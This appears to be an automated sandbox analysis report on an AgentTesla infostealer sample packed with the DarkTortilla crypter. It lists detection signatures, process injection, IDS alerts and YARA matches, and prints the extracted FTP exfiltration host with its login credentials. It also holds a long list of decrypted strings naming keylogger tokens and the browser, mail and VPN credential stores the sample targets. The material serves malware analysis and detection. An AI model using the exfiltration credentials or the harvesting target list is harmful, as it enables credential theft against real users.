
Windows Analysis Report
Xc501VOacR.exe

Overview

General Information

Sample name: Xc501VOacR.exe (renamed because the original name is a hash value)
Original sample name: 61b9f5a1e4ef18ed559b55f51d5c17b51c90c9a75fb5f6523b6243ae2f5bf70c.exe
Analysis ID: 1569282
MD5: 08939a7fe1905c0c6e321e4e2cd90cad
SHA1: c463953c5f52e9bc0137513d69aa9294d84bde75
SHA256: 61b9f5a1e4ef18ed559b55f51d5c17b51c90c9a75fb5f6523b6243ae2f5bf70c
Tags: exe, user-adrian__luca

Detection

AgentTesla, DarkTortilla
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected AntiVM3
Yara detected DarkTortilla Crypter
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates memory in foreign processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to launch a process as a different user
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses FTP
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Xc501VOacR.exe (PID: 2228 cmdline: "C:\Users\user\Desktop\Xc501VOacR.exe" MD5: 08939A7FE1905C0C6E321E4E2CD90CAD)
    • InstallUtil.exe (PID: 3924 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
Malware family information (Malpedia):

Name: Agent Tesla, AgentTesla
Description: A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
Attribution: SWEED
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name: DarkTortilla
Description: DarkTortilla is a complex and highly configurable .NET-based crypter that has possibly been active since at least August 2015. It typically delivers popular information stealers and remote access trojans (RATs) such as AgentTesla, AsyncRat, NanoCore, and RedLine. While it appears to primarily deliver commodity malware, Secureworks Counter Threat Unit (CTU) researchers identified DarkTortilla samples delivering targeted payloads such as Cobalt Strike and Metasploit. It can also deliver "addon packages" such as additional malicious payloads, benign decoy documents, and executables. It features robust anti-analysis and anti-tamper controls that can make detection, analysis, and eradication challenging. From January 2021 through May 2022, an average of 93 unique DarkTortilla samples per week were uploaded to the VirusTotal analysis service. Code similarities suggest possible links between DarkTortilla and other malware: a crypter operated by the RATs Crew threat group, which was active between 2008 and 2012, and the Gameloader malware that emerged in 2021.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.darktortilla

Extracted malware configuration (AgentTesla):
{"Exfil Mode": "FTP", "Host": "ftp://ftp.aminhacorretora.com.br", "Username": "logsftp@aminhacorretora.com.br", "Password": "_yA=,M5*J?KH"}
Yara matches (network capture):

Source | Rule | Description | Author
dump.pcap | JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security

Yara matches (memory dumps, 11 entries in total):

Source | Rule | Description | Author
00000000.00000002.2703482348.0000000005550000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security
00000000.00000002.2701624311.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_DarkTortilla | Yara detected DarkTortilla Crypter | Joe Security
00000000.00000002.2701624311.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000000.00000002.2701624311.0000000003F6D000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
00000004.00000002.3285495307.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security

Yara matches (unpacked PE files, 12 entries in total):

Source | Rule | Description | Author
4.2.InstallUtil.exe.400000.0.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0.2.Xc501VOacR.exe.3fead3a.2.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0.2.Xc501VOacR.exe.3fead3a.2.raw.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0.2.Xc501VOacR.exe.3f9778a.1.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
0.2.Xc501VOacR.exe.3fc126a.0.raw.unpack | JoeSecurity_AgentTesla_2 | Yara detected AgentTesla | Joe Security
Sigma: No Sigma rule has matched
Suricata IDS alerts:

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-05T17:23:33.528204+0100 | 2029927 | 1 | A Network Trojan was detected | 192.168.2.5 | 49830 | 162.241.203.30 | 21 | TCP
2024-12-05T17:23:34.458512+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 49839 | 162.241.203.30 | 31261 | TCP
2024-12-05T17:23:34.578813+0100 | 2855542 | 1 | A Network Trojan was detected | 192.168.2.5 | 49839 | 162.241.203.30 | 31261 | TCP

AV Detection

Source: Xc501VOacR.exe | Avira: detected
Source: http://ftp.aminhacorretora.com.br | Avira URL Cloud: Label: malware
Source: http://aminhacorretora.com.br | Avira URL Cloud: Label: malware
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.aminhacorretora.com.br", "Username": "logsftp@aminhacorretora.com.br", "Password": "_yA=,M5*J?KH"}
Source: Xc501VOacR.exe | ReversingLabs: Detection: 73%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: Xc501VOacR.exe | Joe Sandbox ML: detected
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: /log.tmp
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: yyyy_MM_dd_HH_mm_ss
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: .html
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <html>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: </html>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: yyyy_MM_dd_HH_mm_ss
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: .html
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <html>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: </html>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <br>[
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: yyyy-MM-dd HH:mm:ss
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ]<br>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <br>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: yyyy_MM_dd_HH_mm_ss
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: .html
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: yyyy_MM_dd_HH_mm_ss
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: .zip
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Time:
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <br>User Name:
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <br>Computer Name:
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <br>OSFullName:
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <br>CPU:
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <br>RAM:
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <br>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: IP Address:
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <br>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <hr>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: New
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: MM/dd/yyyy HH:mm:ss
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: IP Address:
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: false
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: false
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: false
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: false
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: false
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: true
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: false
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ftp://ftp.aminhacorretora.com.br
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: logsftp@aminhacorretora.com.br
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: _yA=,M5*J?KH
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: false
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: false
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: appdata
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: XVWmeW
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: XVWmeW.exe
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: XVWmeW
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Type
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <br>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <hr>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <br>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <b>[
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ]</b> (
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: )<br>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {BACK}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {ALT+TAB}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {ALT+F4}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {TAB}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {ESC}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {Win}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {CAPSLOCK}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {KEYUP}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {KEYDOWN}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {KEYLEFT}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {KEYRIGHT}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {DEL}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {END}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {HOME}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {Insert}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {NumLock}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {PageDown}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {PageUp}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {ENTER}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {F1}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {F2}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {F3}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {F4}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {F5}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {F6}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {F7}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {F8}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {F9}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {F10}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {F11}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {F12}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: control
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {CTRL}
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: &amp;
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: &lt;
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: &gt;
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: &quot;
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <br><hr>Copied Text: <br>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <hr>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: logins
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: IE/Edge
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Windows Secure Note
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: 3CCD5499-87A8-4B10-A215-608888DD3B55
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Windows Web Password Credential
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: 154E23D0-C644-4E6F-8CE6-5069272F999F
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Windows Credential Picker Protector
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Web Credentials
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Windows Credentials
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Windows Domain Certificate Credential
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Windows Domain Password Credential
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Windows Extended Credential
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: 00000000-0000-0000-0000-000000000000
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: SchemaId
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: pResourceElement
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: pIdentityElement
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: pPackageSid
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: pAuthenticatorElement
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: IE/Edge
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: UC Browser
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: UCBrowser\
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Login Data
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: journal
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: wow_logins
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Safari for Windows
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Common Files\Apple\Apple Application Support\plutil.exe
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Apple Computer\Preferences\keychain.plist
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <array>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <dict>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <string>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: </string>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <string>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: </string>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: <data>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: </data>
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: -convert xml1 -s -o "
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \fixed_keychain.xml"
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Microsoft\Credentials\
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Microsoft\Protect\
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: credential
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: QQ Browser
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Tencent\QQBrowser\User Data
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Default\EncryptedStorage
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Profile
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \EncryptedStorage
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: entries
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: category
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Password
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: str3
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: str2
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: blob0
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: password_value
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: IncrediMail
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: PopPassword
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: SmtpPassword
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Software\IncrediMail\Identities\
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Accounts_New
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: PopPassword
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: SmtpPassword
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: SmtpServer
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: EmailAddress
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Eudora
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Software\Qualcomm\Eudora\CommandLine\
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: current
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Settings
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: SavePasswordText
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Settings
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ReturnAddress
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Falkon Browser
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \falkon\profiles\
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: profiles.ini
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: startProfile=([A-z0-9\/\.\"]+)
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: profiles.ini
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \browsedata.db
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: autofill
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ClawsMail
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Claws-mail
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \clawsrc
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \clawsrc
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: passkey0
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: master_passphrase_salt=(.+)
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: master_passphrase_pbkdf2_rounds=(.+)
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \accountrc
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: smtp_server
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: address
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: account
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \passwordstorerc
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: {(.*),(.*)}(.*)
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Flock Browser
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: APPDATA
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Flock\Browser\
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: signons3.txt
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: DynDns
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ALLUSERSPROFILE
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Dyn\Updater\config.dyndns
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: username=
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: password=
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: https://account.dyn.com/
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: t6KzXhCh
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: ALLUSERSPROFILE
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Dyn\Updater\daemon.cfg
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: global
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: accounts
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: account.
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: username
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: account.
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: password
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Psi/Psi+
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: name
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: password
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Psi/Psi+
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: APPDATA
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Psi\profiles
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: APPDATA
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \Psi+\profiles
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \accounts.xml
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: \accounts.xml
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: OpenVPN
                        Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpackString decryptor: Software\OpenVPN-GUI\configs
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Software\OpenVPN-GUI\configs
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Software\OpenVPN-GUI\configs\
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: username
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: auth-data
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: entropy
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: USERPROFILE
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: \OpenVPN\config\
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: remote
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: remote
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: NordVPN
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: NordVPN
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: NordVpn.exe*
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: user.config
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: //setting[@name='Username']/value
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: //setting[@name='Password']/value
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: NordVPN
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Private Internet Access
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: %ProgramW6432%
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: Private Internet Access\data
Source: 0.2.Xc501VOacR.exe.403e2ba.5.unpack | String decryptor: ProgramFiles(x86)
